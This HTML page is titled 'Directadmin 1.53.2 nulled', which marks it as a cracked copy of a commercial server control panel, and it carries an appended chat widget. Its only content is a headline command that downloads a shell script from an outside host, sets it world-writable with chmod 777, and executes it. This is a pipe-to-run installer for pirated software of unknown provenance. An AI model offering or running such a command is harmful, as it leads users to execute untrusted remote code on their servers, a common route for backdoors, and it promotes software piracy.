<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1;" />

	<title>Directadmin 1.53.2 nulled</title>

	<style type="text/css">
		* { 
			margin: 0; 
			padding: 0; 
			font-size: 100%; 
		}
		
		body { 
			margin: 10px;
			font-size: 75%; 
			color: #69788E; 
			background: #F7F7F7; 
			font-family: Arial, Verdana, Helvetica, sans-serif;
		}
		
		a:link, a:visited {
			color: #000099;
			text-decoration: none;
		}
		
		a:active, a:hover {
			text-decoration: underline;
		}
		
		h1 {
			color: #333333;
			font-size: 1.70em;
			font-weight: normal;
			margin-bottom: 10px;
			font-family: "Trebuchet MS", Helvetica, sans-serif;
		}
		
		.content_box {
			padding: 10px;
			color: #000000;
			margin-left: auto;
			margin-right: auto;
			background: #FFFFFF;
			border: 1px dashed #CECFCE;
		}
    </style>
</head>
<body>
<div class="content_box">
   	<h1 align="center">&nbsp;</h1>
   	<h1 align="center">&nbsp;</h1>
   	<h1 align="center">wget http://fpt.ovh/setup.sh &amp;&amp; chmod 777 setup.sh &amp;&amp; ./setup.sh</h1>
   	<p align="center">&nbsp;</p>
   	<p align="center">&nbsp;</p>
   	<p align="center">&nbsp;</p>
   	<p align="center">&nbsp;</p>
</div>
    <br />
</body>
</html>
	<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/5b67dd89df040c3e9e0c5067/default';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
